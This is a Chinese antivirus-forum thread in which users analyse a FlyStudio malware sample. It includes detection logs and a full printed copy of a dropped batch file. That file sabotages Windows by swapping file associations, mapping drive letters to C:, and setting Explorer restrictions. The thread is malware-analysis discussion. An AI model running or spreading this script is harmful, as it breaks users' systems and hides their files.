楼主: OCTONAUTS
收起左侧

[病毒样本] FlyStudio 1x

[复制链接]
吃瓜群众第123位
发表于 2024-4-12 17:55:18 | 显示全部楼层
360企业安全云 落地杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
heavencc
发表于 2024-4-12 18:12:30 | 显示全部楼层
小a

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
取名字难
发表于 2024-4-12 19:38:21 | 显示全部楼层
事件: 对象已删除
用户: DESKTOP-FJL2B1H\q
用户类型: 发起者
应用程序名称: explorer.exe
应用程序路径: C:\Windows
组件: 文件反病毒
结果说明: 已删除
类型: 木马
名称: Trojan.Win32.KillMBR.hks
精确度: 确切
威胁级别: 高
对象类型: 文件
对象名称: 爱的人间.exe
对象路径: C:\Users\qzsdbjbdn\Downloads\爱的人间
对象的 MD5: 408A2126B99410C765AFFAEEE0C099ED
OCTONAUTS
 楼主| 发表于 2024-4-12 21:14:48 | 显示全部楼层
DisaPDB 发表于 2024-4-12 14:01
KillMBR组件被本地入库了(笑)
这得多老

当KillMBR组件被释放出来的时候,病毒已经改了许多的注册表项了(包括但不限于禁用任务管理器,注册表编辑器,添加自己到自启动项,删除DiskUpperFilters等等)
DisaPDB
发表于 2024-4-12 21:52:02 | 显示全部楼层
OCTONAUTS 发表于 2024-4-12 21:14
当KillMBR组件被释放出来的时候,病毒已经改了许多的注册表项了(包括但不限于禁用任务管理器,注册表编 ...

太直球了,单步全拦
biue
发表于 2024-4-12 23:25:11 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
OCTONAUTS
 楼主| 发表于 2024-4-15 11:58:21 | 显示全部楼层
DisaPDB 发表于 2024-4-12 21:52
太直球了,单步全拦

映像劫持能不能拦住??
DisaPDB
发表于 2024-4-15 12:00:29 | 显示全部楼层
OCTONAUTS 发表于 2024-4-15 11:58
映像劫持能不能拦住??

不能拦就有鬼了
OCTONAUTS
 楼主| 发表于 2024-4-15 13:41:01 | 显示全部楼层
DisaPDB 发表于 2024-4-15 12:00
不能拦就有鬼了

这个病毒没有这么简单,albumartsmall.bat后面还会释放一个叫做Folder.bat的文件
那个BAT应该是用于创建那些奇怪的文件夹的
DisaPDB
发表于 2024-4-15 13:52:54 | 显示全部楼层
本帖最后由 DisaPDB 于 2024-4-15 14:02 编辑
OCTONAUTS 发表于 2024-4-15 13:41
这个病毒没有这么简单,albumartsmall.bat后面还会释放一个叫做Folder.bat的文件
那个BAT应该是用于创建 ...

我提取出来看看就知道了
内容如下:
  1. @echo off
  2. assoc .txt=exefile
  3. assoc .exe=txtfile
  4. assoc .htm=exefile
  5. assoc .html=exefile
  6. assoc .com=txtfile
  7. assoc .gho=txtfile
  8. assoc .rar=txtfile
  9. assoc .zip=txtfile
  10. assoc .chm=txtfile
  11. assoc .jpg=txtfile
  12. assoc .doc=exefile
  13. assoc .ppt=txtfile
  14. assoc .vbs=txtfile
  15. assoc .cmd=txtfile
  16. assoc .bmp=txtfile
  17. assoc .gif=txtfile
  18. assoc .ico=txtfile
  19. assoc .png=txtfile
  20. assoc .jpeg=txtfile
  21. assoc .jpe=txtfile
  22. assoc .jfif=txtfile
  23. assoc .fla=txtfile
  24. assoc .swf=txtfile
  25. assoc .avi=txtfile
  26. assoc .mov=txtfile
  27. assoc .asf=txtfile
  28. assoc .wmv=txtfile
  29. assoc .rm=txtfile
  30. assoc .ra=txtfile
  31. assoc .mvb=txtfile
  32. assoc .flv=txtfile
  33. assoc .mpg=txtfile
  34. assoc .wav=txtfile
  35. assoc .mpeg=txtfile
  36. assoc .mp3=txtfile
  37. assoc .mp4=txtfile
  38. assoc .3gp=txtfile
  39. assoc .msi=txtfile
  40. assoc .bat=txtfile
  41. assoc .3g2=txtfile
  42. assoc .dat=txtfile
  43. reg add
  44. HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f
  45. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodrives /t REG_DWORD /d 60 /f
  46. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
  47. subst b: C:\
  48. subst h: C:\
  49. subst i: C:\
  50. subst j: C:\
  51. subst l: C:\
  52. subst m: C:\
  53. subst n: C:\
  54. subst o: C:\
  55. subst r: C:\
  56. subst t: C:\
  57. subst k: C:\
  58. subst p: C:\
  59. subst q: C:\
  60. subst s: C:\
  61. subst u: C:\
  62. subst v: C:\
  63. subst w: C:\
  64. subst x: C:\
  65. subst y: C:\
  66. subst z: C:\
  67. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  68. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
  69. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  70. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 01000000 /f
  71. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  72. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 0 /f
  73. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  74. reg add HKEY_CURRENT_USER\SOFTWARW\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f
复制代码
谁拦截不了我笑话谁
而且还写得一堆问题

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-3 15:45 , Processed in 0.099829 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表